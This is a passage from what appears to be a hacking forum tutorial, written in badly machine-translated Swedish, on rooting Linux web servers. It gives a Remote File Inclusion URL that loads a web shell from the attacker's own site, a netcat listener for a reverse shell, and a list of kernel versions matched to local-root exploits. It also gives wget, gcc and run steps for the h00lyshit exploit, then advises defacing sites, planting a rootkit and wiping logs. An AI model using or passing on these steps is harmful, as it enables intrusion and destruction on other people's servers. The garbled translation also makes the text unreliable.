...:: [BABY CORP]:: ...

Du behöver:
Citat:
- Utsatta Site RFI
- Ryggsköldslängd för RFI (t.ex. C99, R57 eller annat)
- Netcat
- Lokala Root Exploit (beroende på kärnan och version)

Detta mål läraren är att bevilja en verklig god redovisningssed i aktion av Rotfästa i Linux Server med Safe Mod: OFF.Suppose att vi accepterar börja en webbplats med RFI sårbarhet:

Kod:

http://www.hackedsite.com/folder/index.html?page =

e kan köra skal utnyttja Remote File Inclusion, enligt följande:

Kod:

http://www.hackedsite.com/folder/index.html?page=http://www.mysite.com/shells/evilscript.txt?

där evilscript.txt är vår webb ryggskölden att vi accepterar redan lagt upp till vår webbplats. (Www.mysite.com i mappen: skal)

Efter att vi antagning med skal, aboriginernas av allt vi kommer att se en anpassning av atom längst upp på sidan eller genom att skriva: uname - en i kommandoraden.

Att följa vi accepterar att fästa med backconnection till boxen. Detta kan göras med två innebär att om vi accepterar det acceptabla skal.

Vi kan använda Back-Connect lopp r57/c99 ryggskölden eller ladda upp en backconnector i en skrivbar mapp

I många av de tankar finns det ett backconnection kärlek efter att ladda upp Klistra Tillbaka Ryggsköldslängd (eller tillägg en ryggskölden i Perl / c). Vi kommer analysen av urbefolkningens sätt som är axiellt ryggskölden (i våra arketyp ryggskölden är R57).

Inledningsvis vi tillgängliga netcat och bevilja acceptera i ett särskilt Anchorage (denna fästpunkt acceptera att vara exakt öppnas / överlämnas i NAT / Brandvägg om vi accepterar en router) med efteråt sätt:

Vi kommer typ: 11.457 i ankarplats tillskriver (Detta är utan förankring för utstå versioner av R57 skal). Vi kan använda och läggas hamn.

Vi trycker i Windows Start -> Kör -> och vi skriver: cmd

Efter att vi kommer att gå till netcat katalogen:

Citat:

cd C: \ Program \ Netcat
Och vi skriva följande kommando:
Citat:
nc-n-l-v-p 11456
Netcat svara: lyssna på [någon] 11456 ...

I axiell sidan av R57 sköldens vi förvärv under efteråt menyn::: Net:: och rygg-connect. Under undersökningsperioden Anatomi vi sköldemärket vår IP (www.cmyip.com att se våra ip om vi accepterar dynamisk)

I Anchorage anatomi vi kommer att förankringen som vi öppnade och netcat lyssnar.

Om vi kolumnist anbringa ryggskölden kommer att svara:

Nu Software försöka fästa förankring 11.456 ...

Om våra inställningar är faktiska netcat kommer att bevilja oss ett ryggskölden till servern

Nu har vi wil hålla sig till Rotfästa processen.

Vi accepterar att förvärva en skrivbar bindemedel i anpassningen för att hämta och förkorta Begränsad Grund Fullbordandet som kommer att bevilja oss grund privilegier i rutan. Beroende på anpassningen av Linux-atomen finns ändras bedrifter. Några gånger utnyttjar avbryta för att köra eftersom vissa lådor är lappat eller att vi inte accepterar den faktiska permissions.List av bedrifter / kernel:

Citat:
2.4.17 -> newlocal, kmod, uselib24
2.4.18 -> brk, brk2, newlocal, kmod
2.4.19 -> brk, brk2, newlocal, kmod
2.4.20 -> ptrace, kmod, ptrace-kmod, brk, brk2
2.4.21 -> brk, brk2, ptrace, ptrace-kmod
2.4.22 -> brk, brk2, ptrace, ptrace-kmod
2.4.22-10 -> loginx
2.4.23 -> mremap_pte
2.4.24 -> mremap_pte, uselib24
2.4.25-1 -> uselib24
2.4.27 -> uselib24
2.6.2 -> mremap_pte, krad, h00lyshit
2.6.5 -> krad, krad2, h00lyshit
2.6.6 -> krad, krad2, h00lyshit
2.6.7 -> krad, krad2, h00lyshit
2.6.8 -> krad, krad2, h00lyshit
2.6.8-5 -> krad2, h00lyshit
2.6.9 -> krad, krad2, h00lyshit
2.6.9-34 -> r00t, h00lyshit
2.6.10 -> krad, krad2, h00lyshit
2.6.13 -> raptor, raptor2, h0llyshit, prctl
2.6.14 -> raptor, raptor2, h0llyshit, prctl
2.6.15 -> raptor, raptor2, h0llyshit, prctl
2.6.16 -> raptor, raptor2, h0llyshit, prctl

Vi kommer att se vid 2.6.8 Linux-kärnan. Vi kommer att ladda h00lyshit utnyttja.

Vissa webbplatser som vi kan förvärva Begränsad Grund Exploatera:

milw0rm (Prova Sökning: "Linux-kärnan)

Andra webbplatser: www.packetstormsecurity.org | www.milw0rm.com eller prova Googlin "kan du hitta dem alla

Vi kan förvärv skrivbar mappar / filer genom att skriva:
Kod:

find /-perm -2-ls

Vi kan använda / tmp bindemedel som är ett accepterat skrivbar mapp

Vi typ:
Kod:

cd / tmp

För att ladda ner som avgränsas utifrån prestation vi kan använda en nedladdning kommando för linux som wget.

Till exempel:
Citat:
wget http://www.yoursite.com/localroot/h00lyshit.c
där http://www.yoursite.com/localroot/h00lyshit.c är adressen till h00lyshit.

Efter hämtningen vi accepterar att förkorta förverkligandet (Läs lärlingstid fullgörandet afore sammanställningen)

För h00lyshit vi accepterar att skriva:
Kod:

gcc h00lyshit.c-o h00lyshit

Nu accepterar vi skapade den körbara filen: h00lyshit.

Kommandot för att köra det här utförandet är:
Kod:

./h00lyshit

Vi debiterar en verklig stor bok om deejay i anpassningen till springa auspiciously och för att få root.

Vi accepterar att aktualisera en stor bok i / tmp eller i tillägg skrivbar mapp.

Kommandot är:
Kod:

dd if = / dev / urandom av = Largefile räkna = 2M

där Largefile är filnamnet.

Vi accepterar att skjuta 2-3 minuter för boken skapas

Om kommandot misslyckas vi kan prova:
Kod:

dd if = / dev / zero of = / tmp / Largefile count = 102400 bs = 1024

Nu kan vi fortsätter till den uthärda steg. Vi kan köra utförandet genom att skriva:
Kod:

./h00lyshit Largefile eller

./h00lyshit / tmp / Largefile

(Om vi är i en förändrad skrivbar bindemedel och Largefile skapas i / tmp)

Om det inte finns aktiva fel (kanske atomen är lappat eller något som är fel med fullbordandet springa eller riklig fil) vi kommer att få root

För analys om vi fick root:

id eller

whoami

Om det står grundval vi fick root!

Nu kan vi vanställa / massa fläck alla webbplatser på servern eller att byråkratin ett rootkit (t.ex. SSHDoor) och att ge ssh / telnet ryggskölden tillträde till servern.

Vi accepterar att avskaffa alla loggar i anpassningen vara säkra med en logg renare. En godtagbar renare för detta arbete är det MIG Logga Cleaner.

Popularity: 53% [ ? ]